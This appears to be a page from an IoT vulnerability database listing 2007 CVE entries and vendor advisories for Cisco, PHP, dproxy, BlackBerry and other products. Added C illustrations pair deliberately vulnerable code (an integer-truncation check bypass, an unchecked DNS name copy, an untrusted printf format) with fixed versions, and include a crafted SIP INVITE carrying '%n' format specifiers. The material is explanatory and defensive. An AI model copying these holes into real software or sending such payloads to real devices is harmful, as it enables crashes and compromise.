VARIoT IoT vulnerabilities database


VAR-200704-0551 CVE-2007-1800 Cisco Secure ACS unauthenticated posture submission allows network access ("NACATTACK") CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Cisco Secure ACS does not require authentication when Cisco Trust Agent (CTA) transmits posture information, which might allow remote attackers to gain network access via a spoofed Network Endpoint Assessment posture, aka "NACATTACK." NOTE: this attack might be limited to authenticated users and devices. Cisco Secure ACS is prone to a remote security vulnerability, also known as "NACATTACK".
VAR-200704-0544 CVE-2007-1793 Symantec Norton Personal Firewall SPBBCDrv.sys denial of service (DoS) vulnerability CVSS V2: 4.9
CVSS V3: -
Severity: MEDIUM
SPBBCDrv.sys in Symantec Norton Personal Firewall 2006 9.1.0.33 and 9.1.1.7 does not validate certain arguments before they are passed to hooked SSDT function handlers, which allows local users to cause a denial of service (crash) or possibly execute arbitrary code via crafted arguments to the (1) NtCreateMutant and (2) NtOpenEvent functions. NOTE: it was later reported that Norton Internet Security 2008 15.0.0.60, and possibly other versions back to 2006, are also affected. Multiple Symantec products are prone to a local denial-of-service vulnerability. This issue occurs when attackers supply invalid argument values to the 'SPBBCDrv.sys' driver. A local attacker may exploit this issue to crash affected computers, denying service to legitimate users. Symantec Norton Personal Firewall is a widely used personal firewall. There is a flaw in the driver implementation of Norton Personal Firewall that local attackers may use to perform denial-of-service attacks against the system. The vulnerability is caused by an input validation error in SPBBCDrv.sys when handling parameters of certain hooked functions. This can be exploited to crash the system by calling NtCreateMutant or NtOpenEvent with specially crafted parameters. The vulnerability is confirmed in version 9.0.0.73 and also reported in versions 9.1.1.7 and 9.1.0.33. Other versions may also be affected. SOLUTION: Restrict access to trusted users only. PROVIDED AND/OR DISCOVERED BY: Matousec Transparent Security ORIGINAL ADVISORY: Matousec Transparent Security: http://www.matousec.com/info/advisories/Norton-Multiple-insufficient-argument-validation-of-hooked-SSDT-functions.php ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) 
http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------
VAR-200703-0432 CVE-2007-1786 Hitachi Collaboration - Online Community Management (as used in Groupmax and other products) SQL injection vulnerability CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
SQL injection vulnerability in Hitachi Collaboration - Online Community Management 01-00 through 01-30, as used in Groupmax Collaboration Portal, Groupmax Collaboration Web Client, uCosminexus Collaboration Portal, Cosminexus Collaboration Portal, and uCosminexus Content Manager, allows remote attackers to execute arbitrary SQL commands via unspecified vectors. Multiple Hitachi products are prone to an SQL-injection vulnerability because the applications fail to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Please see the vendor's advisory for a list of affected products and versions. SOLUTION: Please see the vendor's advisory for fix information. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: Hitachi: http://www.hitachi-support.com/security_e/vuls_e/HS07-008_e/index-e.html
VAR-200704-0209 CVE-2007-1884 PHP printf function family integer signedness error vulnerability CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
Multiple integer signedness errors in the printf function family in PHP 4 before 4.4.5 and PHP 5 before 5.2.1 on 64 bit machines allow context-dependent attackers to execute arbitrary code via (1) certain negative argument numbers that arise in the php_formatted_print function because of 64 to 32 bit truncation, and bypass a check for the maximum allowable value; and (2) a width and precision of -1, which make it possible for the php_sprintf_appendstring function to place an internal buffer at an arbitrary memory location. PHP is prone to multiple vulnerabilities in its printf-family functions due to a design error when casting 64-bit variables to 32 bits. Attackers may be able to exploit these issues to execute arbitrary code in the context of the webserver process or to cause denial-of-service conditions. These issues affect PHP versions prior to 4.4.5 and 5.2.1 running on 64-bit computers. A remote attacker can execute arbitrary code with the help of specific negative argument numbers. SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01086137 Version: 1 HPSBTU02232 SSRT071429 rev.1 - Secure Web Server for HP Tru64 UNIX Powered by Apache (SWS) or HP Internet Express for Tru64 UNIX running PHP, Remote Arbitrary Code Execution, Unauthorized Disclosure of Information, or Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2007-06-25 Last Updated: 2007-06-25 Potential Security Impact: Remote Arbitrary Code Execution, Unauthorized Disclosure of Information, or Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential vulnerabilities have been reported on the PHP Hypertext Processing Engine provided with the Secure Web Server for HP Tru64 UNIX Powered by Apache (SWS) and HP Internet Express for Tru64 UNIX (IX). 
References: CVE-2006-4625 CVE-2007-0988 CVE-2007-1286 CVE-2007-1380 CVE-2007-1700 CVE-2007-1701 CVE-2007-1710 CVE-2007-1835 CVE-2007-1884 CVE-2007-1885 CVE-2007-1886 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The following supported software versions running PHP Hypertext Processing Engine v 4.4.4 are affected: HP Internet Express for Tru64 UNIX (IX) v 6.6 and earlier Secure Web Server for HP Tru64 UNIX Powered by Apache (SWS) v 6.6.4 and earlier BACKGROUND RESOLUTION HP is providing PHP v 4.4.6 as part of Secure Web Server for HP Tru64 UNIX Powered by Apache (SWS) v 6.6.5, which resolves the potential vulnerabilities. Until the update is available in the mainstream product release, HP is releasing the following two setld-based kits publicly for use by any customer. The resolutions contained in the kits are targeted for availability in the following mainstream product release: HP Internet Express for Tru64 UNIX v 6.7 The kits distribute the following: Secure Web Server for HP Tru64 UNIX Powered by Apache (SWS) with PHP v 4.4.6 installable kit Secure Web Server for HP Tru64 UNIX Powered by Apache (SWS) with PHP v 4.4.6 installable kit and source files Secure Web Server for HP Tru64 UNIX v 6.6.5 PREREQUISITE: HP Tru64 UNIX v 5.1A or later Name: sws_v6_6_5_kit.tar.gz Location: http://h30097.www3.hp.com/internet/download.htm#sws Secure Web Server for HP Tru64 UNIX v 6.6.5 including Source Files PREREQUISITE: HP Tru64 UNIX v 5.1A or later Name: sws_v6_6_5_src_kit.tar.gz Location: http://h30097.www3.hp.com/internet/download.htm#sws PRODUCT SPECIFIC INFORMATION HISTORY Version:1 (rev.1) - 25 June 2007 Initial release Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. 
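The following is an added illustration, not PHP's own code, of part (1) of the CVE-2007-1884 entry above: an argument number parsed into a 64-bit C long, narrowed to a 32-bit int, and only then compared against the argument count, so that a large value becomes negative and slips past a check that looks only at the upper bound. The function names, the NB_ARGS constant and the use of strtoll (standing in for the 64-bit long of an LP64 build) are this example's own assumptions; the hardened version shows the order of operations that closes the hole.

```c
/* Added example, not PHP's own code. It models part (1) of the issue above:
 * php_formatted_print read the "N$" argument number into a C long, which is
 * 64 bits wide on LP64 builds, narrowed it to a 32-bit int and only then
 * compared it with the argument count. The function names, NB_ARGS and the
 * use of strtoll (standing in for the 64-bit long) are this example's own. */
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>

#define NB_ARGS      4        /* arguments actually passed to the sprintf() call */
#define ARG_REJECTED INT_MIN  /* sentinel: the bounds check refused the number */

/* Vulnerable pattern: parse wide, narrow, then check only the upper bound.
 * Returns the index the caller would use to select an argument. */
int vuln_argnum(const char *digits)
{
    long long wide = strtoll(digits, NULL, 10);  /* 4294967295 fits in 64 bits */
    int argnum = (int)wide;                      /* GCC/Clang reduce modulo 2^32: 0xFFFFFFFF -> -1 */
    if (argnum >= NB_ARGS)                       /* negative values pass this test */
        return ARG_REJECTED;
    return argnum;                               /* args[-1]: a read outside the argument array */
}

/* Hardened pattern: validate the number in the wide type, both bounds, and
 * reject anything the narrowing could not represent, before converting. */
int safe_argnum(const char *digits)
{
    char *end = NULL;
    errno = 0;
    long long wide = strtoll(digits, &end, 10);
    if (end == digits || *end != '\0' || errno == ERANGE)
        return ARG_REJECTED;                     /* not a clean decimal number */
    if (wide < 0 || wide >= NB_ARGS || wide > INT_MAX)
        return ARG_REJECTED;                     /* checked before, not after, narrowing */
    return (int)wide;                            /* now known to fit */
}

int main(void)
{
    const char *inputs[] = { "2", "5", "4294967295", "9223372036854775807" };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        int v = vuln_argnum(inputs[i]);
        int s = safe_argnum(inputs[i]);
        printf("%-20s vulnerable: %-9s hardened: %s\n", inputs[i],
               v == ARG_REJECTED ? "rejected" : "accepted",
               s == ARG_REJECTED ? "rejected" : "accepted");
        if (v != ARG_REJECTED)
            printf("%-20s   -> would index args[%d]\n", "", v);
    }
    return 0;
}
```

The general lesson is the ordering: range-check a value in the width it was parsed in, then narrow; a check performed on the narrowed value sees only what survived the truncation. The (int) conversion of an out-of-range value is implementation-defined in C; GCC and Clang document the modulo behaviour the comment relies on.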
VAR-200704-0592 CVE-2007-1833 CUCM SCCP implementation denial of service (DoS) vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The Skinny Call Control Protocol (SCCP) implementation in Cisco Unified CallManager (CUCM) 3.3 before 3.3(5)SR2a, 4.1 before 4.1(3)SR4, 4.2 before 4.2(3)SR1, and 5.0 before 5.0(4a)SU1 allows remote attackers to cause a denial of service (loss of voice services) by sending crafted packets to the (1) SCCP (2000/tcp) or (2) SCCPS (2443/tcp) port. Cisco Unified CallManager (CUCM) and Cisco Unified Presence Server (CUPS) are prone to multiple remote denial-of-service vulnerabilities. These issues occur because the devices fail to handle certain network packets or network requests. An attacker can exploit these issues to crash the affected services on the devices, denying service to legitimate users. This vulnerability is tracked as Cisco Bug ID CSCsf10805
VAR-200704-0593 CVE-2007-1834 CUCM and CUPS ICMP echo flood denial of service (DoS) vulnerability CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
Cisco Unified CallManager (CUCM) 5.0 before 5.0(4a)SU1 and Cisco Unified Presence Server (CUPS) 1.0 before 1.0(3) allow remote attackers to cause a denial of service (loss of voice services) via a flood of ICMP echo requests, aka bug ID CSCsf12698. These issues occur because the devices fail to handle certain network packets or network requests. An attacker can exploit these issues to crash the affected services on the devices, denying service to legitimate users. The CUCM vulnerability is tracked as Cisco Bug ID CSCsf12698 and the CUPS vulnerability as Cisco Bug ID CSCsg60930
VAR-200704-0585 CVE-2007-1826 CUCM IPSec Manager Service denial of service (DoS) vulnerability CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
Unspecified vulnerability in the IPSec Manager Service for Cisco Unified CallManager (CUCM) 5.0 before 5.0(4a)SU1 and Cisco Unified Presence Server (CUPS) 1.0 before 1.0(3) allows remote attackers to cause a denial of service (loss of cluster services) via a "specific UDP packet" to UDP port 8500, aka bug ID CSCsg60949. Cisco Unified CallManager (CUCM) and Cisco Unified Presence Server (CUPS) are prone to multiple remote denial-of-service vulnerabilities. These issues occur because the devices fail to handle certain network packets or network requests. An attacker can exploit these issues to crash the affected services on the devices, denying service to legitimate users. The CUCM vulnerability is tracked as Cisco Bug ID CSCsg20143 and the CUPS vulnerability as Cisco Bug ID CSCsg60949
VAR-200703-0389 CVE-2007-1728 PS3 and PSP Remote Play feature denial of service (DoS) vulnerability CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
The Remote Play feature in Sony Playstation 3 (PS3) 1.60 and Playstation Portable (PSP) 3.10 OE-A allows remote attackers to cause a denial of service via a flood of UDP packets. The Remote Play feature of the PS3 and PSP is prone to a denial-of-service vulnerability
VAR-200706-0408 CVE-2007-3347 D-Link DPH-540/DPH-541 arbitrary SIP communication vulnerability CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
The D-Link DPH-540/DPH-541 phone accepts SIP INVITE messages that are not from the Call Server's IP address, which allows remote attackers to engage in arbitrary SIP communication with the phone, as demonstrated by communication with forged caller ID. The D-Link DPH-540 and DPH-541 are popular Wi-Fi internet phone handsets. The handsets do not verify that incoming SIP requests originate from the configured Call Server, so a remote attacker can send SIP messages directly to the device. An attacker can exploit this issue to bypass security restrictions
VAR-200706-0515 CVE-2007-3444 Research in Motion BlackBerry 7270 SIP INVITE format string denial of service (DoS) vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
The Research in Motion BlackBerry 7270 with 4.0 SP1 Bundle 83 allows remote attackers to cause a denial of service (blocked call reception) via a malformed SIP INVITE message, possibly related to multiple format string specifiers in the From field, a spoofed source IP address, and limitations of the function stack frame. The BlackBerry 7270 phone is prone to a remote format-string vulnerability. An attacker can exploit this issue to cause certain features of the phone to become unusable until the phone has been reset. BlackBerry 7270 with BlackBerry Device Software 4.0.1.83 and earlier versions is vulnerable. NOTE: when exploited, the device may display the following error message: "Uncaught exception: java.lang.IllegalArgumentException"
VAR-200706-0514 CVE-2007-3443 Research in Motion BlackBerry 7270 SIP transaction state denial of service (DoS) vulnerability CVSS V2: 2.3
CVSS V3: -
Severity: LOW
The Research in Motion BlackBerry 7270 before 4.0 SP1 Bundle 108 does not properly manage transaction states, which allows remote attackers to cause a denial of service (temporary device hang) by sending a certain SIP INVITE message, but not providing an ACK when the call is answered. The BlackBerry 7270 is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause certain features of the phone to become unusable until the phone has been reset. NOTE: the denial-of-service condition persists even after the phone re-registers with the Registrar. BlackBerry 7270 with BlackBerry Device Software 4.0.1.83 and prior versions is vulnerable
VAR-200706-0409 CVE-2007-3348 D-Link DPH-540/DPH-541 Wi-Fi Phones SDP Header Denial Of Service Vulnerability CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
The D-Link DPH-540/DPH-541 phone allows remote attackers to cause a denial of service (device outage) via a malformed SDP header in a SIP INVITE message. The D-Link DPH-540/DPH-541 Wi-Fi phone is prone to a remote denial-of-service vulnerability in its handling of the SDP header of a SIP INVITE message. An attacker can exploit this issue to cause certain features of the phone to become unusable until the phone has been reset
VAR-200704-0125 CVE-2007-1866 dproxy-nexgen dns_decode_reverse_name function stack-based buffer overflow vulnerability CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Stack-based buffer overflow in the dns_decode_reverse_name function in dns_decode.c in dproxy-nexgen allows remote attackers to execute arbitrary code by sending a crafted packet to port 53/udp, a different issue than CVE-2007-1465. The dns_decode_reverse_name function in dns_decode.c of dproxy-nexgen contains a stack-based buffer overflow vulnerability. dproxy is a small caching DNS server. dproxy is prone to a remote buffer-overflow vulnerability because it fails to properly check boundaries on user-supplied data before copying it to an insufficiently sized buffer. Exploiting this issue could lead to denial-of-service conditions and to the execution of arbitrary machine code with superuser privileges. A successful attack could result in the complete compromise of affected computers or routers/devices. Version 1.c is vulnerable; other versions may also be affected. TITLE: dproxy-nexgen "dns_decode_reverse_name" Buffer Overflow Vulnerability SECUNIA ADVISORY ID: SA24688 VERIFY ADVISORY: http://secunia.com/advisories/24688/ CRITICAL: Moderately critical IMPACT: System access WHERE: From local network SOFTWARE: dproxy-nexgen http://secunia.com/product/13834/ DESCRIPTION: mu-b has discovered a vulnerability in dproxy-nexgen, which can be exploited by malicious people to compromise a vulnerable system. Successful exploitation allows execution of arbitrary code. The vulnerability is confirmed in the latest available version (2007-04-02). SOLUTION: Use the software only in a trusted network environment. 
PROVIDED AND/OR DISCOVERED BY: mu-b ORIGINAL ADVISORY: http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/053289.html
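The following is an added illustration of the bug class in the dproxy-nexgen entry above, not dproxy's own code: a DNS wire-format name decoder that trusts the length octets in the packet and copies into a fixed stack buffer, beside a decoder that checks every read against the packet length and every write against the output buffer. The actual logic of dns_decode_reverse_name is not on this page, so the function names, buffer sizes and the three sample packets below are this example's own constructions.

```c
/* Added example, not dproxy-nexgen's code: the unchecked-copy pattern behind a
 * stack overflow in a DNS name decoder, next to a bounds-checked decoder.
 * dns_decode_reverse_name's actual logic is not on this page; the function
 * names, the buffer sizes and the sample packets are this example's own. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NAME_WIRE_MAX 255   /* RFC 1035: whole wire-format name, length octets and terminator included */

/* Vulnerable pattern: trusts each length octet from the packet and copies into
 * a fixed-size buffer without comparing offsets to either buffer's size. A
 * crafted packet with long labels writes past out[]. Only call this on benign
 * input; it is here to show the missing checks, not to be fed packets. */
int decode_name_vuln(const uint8_t *pkt, char out[64])
{
    size_t o = 0, off = 0;
    while (pkt[off] != 0) {                 /* no check that off is inside the packet */
        uint8_t len = pkt[off++];
        memcpy(out + o, pkt + off, len);    /* no check that o + len fits in out */
        o += len;
        off += len;
        out[o++] = '.';
    }
    if (o)
        o--;                                /* drop the trailing '.' */
    out[o] = '\0';
    return (int)o;
}

/* Hardened decoder: every read checked against pkt_len, every write against
 * out_len, RFC limits enforced. Returns the presentation-form length, or -1 on
 * malformed input. Compression pointers are rejected rather than followed. */
int decode_name_safe(const uint8_t *pkt, size_t pkt_len, size_t start,
                     char *out, size_t out_len)
{
    size_t o = 0, off = start;
    if (out_len == 0)
        return -1;
    for (;;) {
        if (off >= pkt_len)
            return -1;                      /* truncated: length octet missing */
        uint8_t len = pkt[off++];
        if (len == 0)
            break;                          /* terminator */
        if (len & 0xC0)
            return -1;                      /* >63: compression pointer or reserved bits */
        if (off + len > pkt_len)
            return -1;                      /* label runs past the packet */
        if (off + len - start + 1 > NAME_WIRE_MAX)
            return -1;                      /* whole name too long (+1 for the terminator) */
        if (o + len + 1 > out_len)
            return -1;                      /* no room for the label plus '.' or NUL */
        memcpy(out + o, pkt + off, len);
        o += len;
        off += len;
        out[o++] = '.';
    }
    if (o)
        o--;
    out[o] = '\0';
    return (int)o;
}

/* Constructed sample packets (not captured traffic). */
const uint8_t SAMPLE_OK[] = { 3,'w','w','w', 7,'e','x','a','m','p','l','e', 3,'c','o','m', 0 };
const uint8_t SAMPLE_TRUNCATED[] = { 5,'a','b' };            /* claims 5 bytes, carries 2 */
const uint8_t SAMPLE_BAD_LABEL[] = { 0x40,'a','b','c', 0 };  /* 64: not a valid label length */

static char last_out[256];

/* Decode into a scratch buffer treated as out_len bytes long; returns what
 * decode_name_safe returns, so the size check can be exercised directly. */
int try_decode(const uint8_t *pkt, size_t pkt_len, size_t out_len)
{
    if (out_len > sizeof last_out)
        out_len = sizeof last_out;
    memset(last_out, 0, sizeof last_out);
    return decode_name_safe(pkt, pkt_len, 0, last_out, out_len);
}
const char *last_decoded(void) { return last_out; }

int main(void)
{
    char buf[64];
    printf("vulnerable decoder, benign input: %d \"%s\"\n", decode_name_vuln(SAMPLE_OK, buf), buf);
    printf("hardened, 64-byte buffer: %d \"%s\"\n", try_decode(SAMPLE_OK, sizeof SAMPLE_OK, 64), last_decoded());
    printf("hardened, 8-byte buffer: %d\n", try_decode(SAMPLE_OK, sizeof SAMPLE_OK, 8));
    printf("hardened, truncated packet: %d\n", try_decode(SAMPLE_TRUNCATED, sizeof SAMPLE_TRUNCATED, 64));
    printf("hardened, 64-byte label: %d\n", try_decode(SAMPLE_BAD_LABEL, sizeof SAMPLE_BAD_LABEL, 64));
    return 0;
}
```

The hardened decoder deliberately refuses compression pointers instead of following them; a resolver that must handle them needs an additional jump counter to stop pointer loops, which is a separate class of parser bug from the overflow shown here.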
VAR-200703-0308 CVE-2007-1642 ManageEngine Firewall Analyzer arbitrary common file access vulnerability CVSS V2: 4.0
CVSS V3: -
Severity: MEDIUM
Unspecified vulnerability in ManageEngine Firewall Analyzer allows remote authenticated users to "access any common file" via a direct URL request. ManageEngine Firewall Analyzer is prone to a remote information-disclosure vulnerability. A remote authenticated attacker can leverage this issue to access sensitive data. Information obtained could aid in further attacks. TITLE: ManageEngine Firewall Analyzer Information Disclosure SECUNIA ADVISORY ID: SA24707 VERIFY ADVISORY: http://secunia.com/advisories/24707/ CRITICAL: Less critical IMPACT: Exposure of sensitive information WHERE: From remote SOFTWARE: ManageEngine Firewall Analyzer 4.x http://secunia.com/product/13811/ DESCRIPTION: yearsilent has reported a security issue in ManageEngine Firewall Analyzer, which can be exploited by malicious users to disclose potentially sensitive information. SOLUTION: Reportedly, the vulnerability will be fixed in build 4030. Please contact the vendor for early access to this build version. PROVIDED AND/OR DISCOVERED BY: yearsilent
VAR-200703-0600 CVE-2007-1577 GeBlog index.php Directory Traversal Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php. GeBlog's index.php contains a directory traversal vulnerability. By a third party .. GeBlog is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to access sensitive information and to execute local script code in the context of the application; this may facilitate other attacks against the affected computer. GeBlog 0.1 is vulnerable; other versions may also be affected
VAR-200703-0447 CVE-2007-1542 Cisco IP Phone 7940/7960 SIP INVITE denial of service (DoS) vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Unspecified vulnerability in the Cisco IP Phone 7940 and 7960 running firmware before POS8-6-0 allows remote attackers to cause a denial of service via the Remote-Party-ID sipURI field in a SIP INVITE request. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information. Cisco 7940/7960 phones are prone to a remote denial-of-service vulnerability. Cisco IP Phone is a system for providing voice communication over an IP network. The vulnerability is caused by an error in the handling of certain SIP INVITE messages. This can be exploited to reboot the device by sending a specially crafted INVITE message with a malformed "sipURI" field in the Remote-Party-ID header. The vulnerability is reported in devices running firmware POS3-07-4-00. SOLUTION: Reportedly, firmware POS8-6-0 is unaffected. PROVIDED AND/OR DISCOVERED BY: Humberto J. Abdelnur, Radu State, and Olivier Festor
VAR-200703-0627 CVE-2007-1585 Linksys WAG200G sensitive information (passwords and configuration data) disclosure vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The Linksys WAG200G with firmware 1.01.01, WRT54GC 2 with firmware 1.00.7, and WRT54GC 1 with firmware 1.03.0 and earlier allow remote attackers to obtain sensitive information (passwords and configuration data) via a packet to UDP port 916. NOTE: some of these details are obtained from third party information. The Linksys WAG200G is prone to a vulnerability that may disclose sensitive information. An attacker can exploit this issue to retrieve sensitive information that may aid in further attacks. This issue affects firmware version 1.01.01; other versions may also be vulnerable. The Linksys WAG200G is a wireless ADSL router. TITLE: Linksys Products Information Disclosure Security Issue SECUNIA ADVISORY ID: SA24658 VERIFY ADVISORY: http://secunia.com/advisories/24658/ CRITICAL: Moderately critical IMPACT: Exposure of system information, Exposure of sensitive information WHERE: From local network OPERATING SYSTEM: Linksys WAG200G http://secunia.com/product/13810/ Linksys WRT54GC http://secunia.com/product/13808/ DESCRIPTION: A security issue has been reported in various Linksys products, which can be exploited to disclose certain sensitive information (the product model, the web interface password, the PPPoA username, the PPPoA password, the SSID, and the WPA passphrase) by sending a UDP packet to port 916 of the device. The security issue is reported in WAG200G with firmware 1.01.03 and earlier, WRT54GC v1 with firmware 1.03.0 and earlier, and WRT54GC v2 with firmware 1.00.7 and earlier. 
PROVIDED AND/OR DISCOVERED BY: Daniel Niggebrugge, additional information by Bartłomiej Ochman
VAR-200703-0462 CVE-2007-1557 F-Secure Anti-Virus Client Security format string denial of service (DoS) vulnerability CVSS V2: 7.2
CVSS V3: -
Severity: HIGH
Format string vulnerability in F-Secure Anti-Virus Client Security 6.02 allows local users to cause a denial of service and possibly gain privileges via format string specifiers in the Management Server name field on the Communication settings page. F-Secure Anti-Virus Client Security is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input before using it as the format-specifier argument of a formatted-printing function. Successfully exploiting this vulnerability may allow an attacker to access sensitive process memory or to crash the application. Code execution may potentially be possible, but this has not been confirmed. F-Secure Anti-Virus Client Security is a real-time virus monitoring and protection product for the PC platform, supporting all Windows versions
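The BlackBerry 7270 entry (CVE-2007-3444, format string specifiers in the SIP From field) and the F-Secure entry above (CVE-2007-1557, specifiers in the Management Server name field) describe the same bug class: an attacker-controlled string reaching a printf-family function as its format argument. The following added example, which is neither RIM's nor F-Secure's code, shows the vulnerable call beside the fixed one, a header extractor for a constructed SIP INVITE, and a check that flags conversion specifiers in such a field. The message, the function names and the buffer sizes are this example's own assumptions.

```c
/* Added example, not RIM's or F-Secure's code. Both entries describe the same
 * bug class: an attacker-controlled string (a SIP From header, a server-name
 * setting) reaching a printf-family function as the format argument. Shown
 * here: the vulnerable and the fixed call, a header extractor for a
 * constructed SIP INVITE, and a check that flags conversion specifiers in
 * such a field. The message, the names and the buffer sizes are this example's own. */
#include <stdio.h>
#include <string.h>

/* Vulnerable: the untrusted string is the format. "%%" alone shows the
 * interpretation; "%s" or "%n" would read or write through whatever the stack
 * frame holds. The call goes through a pointer only so the file builds under
 * -Werror=format-security; that warning, on a direct call, is the cheapest
 * detection for this bug class. */
int log_vuln(const char *untrusted, char *line, size_t n)
{
    int (*fmt_fn)(char *, size_t, const char *, ...) = snprintf;
    return fmt_fn(line, n, untrusted);
}

/* Fixed: constant format, untrusted data passed as an argument. */
int log_safe(const char *untrusted, char *line, size_t n)
{
    return snprintf(line, n, "%s", untrusted);
}

/* 1 if the field holds a '%' that does not form the escaped "%%". */
int has_format_specifier(const char *s)
{
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {
            p++;
            continue;
        }
        return 1;
    }
    return 0;
}

/* Copy the value of one "Name: value" header from a CRLF-delimited SIP
 * message. Returns the value length, or -1 if absent or too long for out. */
int sip_header(const char *msg, const char *name, char *out, size_t out_len)
{
    size_t nlen = strlen(name);
    const char *p = msg;
    while (*p) {
        const char *eol = strstr(p, "\r\n");
        size_t linelen = eol ? (size_t)(eol - p) : strlen(p);
        if (linelen > nlen && strncmp(p, name, nlen) == 0 && p[nlen] == ':') {
            const char *v = p + nlen + 1, *end = p + linelen;
            while (v < end && *v == ' ')
                v++;
            size_t vlen = (size_t)(end - v);
            if (vlen + 1 > out_len)
                return -1;
            memcpy(out, v, vlen);
            out[vlen] = '\0';
            return (int)vlen;
        }
        if (!eol)
            break;
        p = eol + 2;
    }
    return -1;
}

/* Constructed INVITE, not captured traffic: the From display name carries
 * format specifiers, as the BlackBerry 7270 entry describes. */
const char SAMPLE_INVITE[] =
    "INVITE sip:phone@192.0.2.10 SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 198.51.100.7:5060\r\n"
    "From: \"%s%s%s%n\" <sip:caller@198.51.100.7>;tag=1\r\n"
    "To: <sip:phone@192.0.2.10>\r\n"
    "CSeq: 1 INVITE\r\n"
    "Content-Length: 0\r\n"
    "\r\n";

static char scratch[128];
const char *render_vuln(const char *s) { log_vuln(s, scratch, sizeof scratch); return scratch; }
const char *render_safe(const char *s) { log_safe(s, scratch, sizeof scratch); return scratch; }
const char *sample_from(void)
{
    return sip_header(SAMPLE_INVITE, "From", scratch, sizeof scratch) < 0 ? NULL : scratch;
}

int main(void)
{
    printf("vulnerable: %s\n", render_vuln("100%% done"));
    printf("fixed:      %s\n", render_safe("100%% done"));
    const char *from = sample_from();
    printf("From: %s -> %s\n", from ? from : "(missing)",
           from && has_format_specifier(from) ? "REJECT: format specifiers" : "ok");
    return 0;
}
```

The specifier check is a detection aid for a SIP proxy or IDS rule in front of devices that cannot be patched; it is not a substitute for the fix, which is the constant format in log_safe. Running the vulnerable function on the sample From value is left out on purpose: with "%s" and "%n" present it would read and write through the caller's stack frame, which is the crash the BlackBerry entry reports.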
VAR-200703-0606 CVE-2007-1467 Multiple Cisco products PreSearch.html cross-site scripting vulnerability CVSS V2: 3.5
CVSS V3: -
Severity: LOW
Multiple cross-site scripting (XSS) vulnerabilities in (1) PreSearch.html and (2) PreSearch.class in Cisco Secure Access Control Server (ACS), VPN Client, Unified Personal Communicator, MeetingPlace, Unified MeetingPlace, Unified MeetingPlace Express, CallManager, IP Communicator, Unified Video Advantage, Unified Videoconferencing 35xx products, Unified Videoconferencing Manager, WAN Manager, Security Device Manager, Network Analysis Module (NAM), CiscoWorks and related products, Wireless LAN Solution Engine (WLSE), 2006 Wireless LAN Controllers (WLC), and Wireless Control System (WCS) allow remote attackers to inject arbitrary web script or HTML via the text field of the search form. Multiple Cisco products are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. An attacker may leverage this issue by enticing a victim into following a maliciously crafted URI. Attackers may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco IDs: CSCsh91761, CSCsh52300, CSCsh91884, CSCsi12435, CSCsh91901, CSCsi10405, CSCsh91953, CSCsh93070, CSCsh93854, CSCek71039, CSCsh95009, CSCsi10818, CSCsi10674, CSCsi10982, CSCsi13743, CSCsi13763. A remote attacker can inject arbitrary web script or HTML via the text field of the search form. Input passed to the search code of PreSearch.html or PreSearch.class (depending on software or device) is not properly sanitised before being returned to the user. SOLUTION: If possible, the vendor recommends deleting or renaming the PreSearch.html and PreSearch.class files. PROVIDED AND/OR DISCOVERED BY: Independently discovered by Erwin Paternotte from Fox-IT and Cassio Goldschmidt. 
ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sr-20070315-xss.shtml
